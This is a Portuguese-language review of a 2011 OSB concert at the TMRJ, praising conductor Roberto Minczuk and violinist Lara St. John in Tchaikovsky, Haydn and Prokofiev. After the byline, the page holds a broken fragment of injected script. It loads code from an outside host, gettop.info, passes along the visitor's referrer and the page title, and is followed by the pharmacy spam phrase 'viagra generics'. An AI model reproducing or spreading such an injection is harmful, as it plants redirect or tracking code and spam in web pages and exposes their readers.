Crítica

OSB, Roberto Minczuk e Lara St. John

A OSB , agora regida por seu titular Roberto Minczuk, apresentou-se no TMRJ no dia 27 de agosto de 2011, em variadíssimo, equilibrado e bem bolado programa.

Tivemos o mais que famoso concerto em ré maior para violino e orquestra de Tchaicovsky, a conhecida e querida sinfonia n. 104 de Haydn e a popular sinfonia “Clássica” de Prokofiev.

Em todas as peças executadas, sentiu-se a mão firme e incisiva do regente Minczuk, preciso ao dar entradas e a comandar cortes, inspirado na escolha dos tempos e dos diferentes estilos, visivelmente dedicado à sua arte e a seu métier. Minczuk nos tem dado cada vez mais a imagem de um regente de orquestra profissional e ao mesmo tempo apaixonado pela Música, tal o seu entusiasmo no pódio e fora dele .

Indo agora a outro pólo, diremos que o maior problema dos instrumentos de corda é a afinação e, com as atuais condições de acústica do TMRJ, não nos foi possível concluir nada nessa área. Foi possível, por outro lado ver e ouvir que tivemos um concerto bem tocado pela solista Lara St. John, tanto na área técnica, dedilhado firmíssimo e agilíssimo, quanto na área interpretativa. Sobrou romance, sobraram melodias amorosas, sobrou “slancio”. Sem um regente de pulso e de inspiração musical à flor da pele, muito do que se assinalou acima não teria ocorrido. Perdão pelo óbvio. Às vezes é bom ser óbvio. Muitos se esquecem dele…

A sinfonia 104 de Haydn foi exemplarmente regida e tocada, ritmo muito bem exposto pelo regente, que muitas vezes o batia com os pés e assinalava com gestos sumamente convincentes. O mesmo se poderá dizer da peça de Prokofiev. Muitos aplausos saudaram o regente Minczuk, inclusive porque não se conseguia esconder a alegria e a emoção de vê-lo ali no pódio regendo a “sua” OSB .

 

MARCUS GÓES –OSB/MINCZUK/ST. JOHN/TMRJ/27-08-2011.                  ´[s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; viagra generics